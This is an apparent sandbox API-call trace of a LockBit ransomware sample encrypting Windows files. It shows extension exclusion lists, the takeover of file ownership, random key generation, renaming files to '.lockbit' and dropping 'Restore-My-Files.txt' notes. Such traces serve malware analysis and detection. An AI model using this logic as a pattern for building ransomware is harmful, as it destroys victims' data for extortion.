[0095.709] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0095.710] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0095.710] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0095.710] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0095.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0095.710] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0095.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0095.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0095.711] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0095.711] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0095.711] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0095.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0095.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png") returned=".png" [0095.711] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0095.711] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0095.711] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0095.711] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0095.712] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0095.712] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0095.713] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png.lockbit") returned 79 [0095.713] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.715] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0095.717] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.717] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.719] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.720] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.720] RtlFreeAnsiString (AnsiString="\\") [0095.720] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0095.721] malloc (_Size=0x200) returned 0x77d800 [0095.721] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.721] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.721] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.721] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.722] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.722] CloseHandle (hObject=0x1194) returned 1 [0095.722] free (_Block=0x77d800) [0095.722] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0095.722] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.723] malloc (_Size=0x40068) returned 0x1ff1e60 [0095.723] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4570) returned 1 [0095.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0095.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0095.775] ReadFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0095.814] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0095.823] malloc (_Size=0xb4) returned 0x77d800 [0095.828] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0095.859] free (_Block=0x77d800) [0095.859] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0095.859] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0095.859] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0095.860] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.860] malloc (_Size=0x40068) returned 0x3ef0008 [0095.860] WriteFile (in: hFile=0x334, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0095.861] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0095.861] lstrcmpiW (lpString1=".", lpString2="15x15dot.png") returned -1 [0095.861] lstrcmpiW (lpString1="..", lpString2="15x15dot.png") returned -1 [0095.861] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0095.861] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0095.861] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0095.861] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0095.861] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0095.862] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0095.862] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0095.862] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0095.862] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0095.862] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0095.862] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0095.863] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0095.863] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0095.863] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0095.863] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0095.863] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0095.863] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0095.863] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="15x15dot.png") returned 1 [0095.863] lstrcmpiW (lpString1="ntldr", lpString2="15x15dot.png") returned 1 [0095.863] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="15x15dot.png") returned 1 [0095.863] lstrcmpiW (lpString1="bootsect.bak", lpString2="15x15dot.png") returned 1 [0095.863] lstrcmpiW (lpString1="autorun.inf", lpString2="15x15dot.png") returned 1 [0095.863] lstrcmpiW (lpString1="thumbs.db", lpString2="15x15dot.png") returned 1 [0095.863] lstrcmpiW (lpString1="iconcache.db", lpString2="15x15dot.png") returned 1 [0095.864] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0095.864] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png") returned=".png" [0095.864] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0095.864] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0095.864] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0095.864] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0095.864] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0095.864] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0095.864] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0095.864] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0095.865] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0095.865] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0095.865] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0095.865] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png.lockbit") returned 74 [0095.865] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.867] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0095.868] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.868] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.870] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.871] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.871] RtlFreeAnsiString (AnsiString="\\") [0095.871] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13e0) returned 0x0 [0095.871] malloc (_Size=0x200) returned 0x77d800 [0095.871] NtQueryInformationToken (in: TokenHandle=0x13e0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.871] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.871] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.871] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.872] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.872] CloseHandle (hObject=0x13e0) returned 1 [0095.872] free (_Block=0x77d800) [0095.872] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e0 [0095.872] CreateIoCompletionPort (FileHandle=0x13e0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.872] malloc (_Size=0x40068) returned 0x3db00b8 [0095.875] GetFileSizeEx (in: hFile=0x13e0, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=2821) returned 1 [0095.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0095.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0095.880] ReadFile (in: hFile=0x13e0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0095.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0095.890] malloc (_Size=0xaa) returned 0x77d800 [0095.890] NtSetInformationFile (FileHandle=0x13e0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0095.891] free (_Block=0x77d800) [0095.891] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0095.891] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0095.891] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.891] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0095.891] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0095.891] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0095.891] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0095.891] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0095.891] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0095.891] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0095.892] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0095.892] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0095.892] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0095.892] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0095.893] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0095.893] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0095.893] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0095.893] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0095.893] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0095.893] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0095.893] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0095.894] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0095.894] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.894] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0095.894] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0095.894] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0095.894] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0095.894] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0095.894] 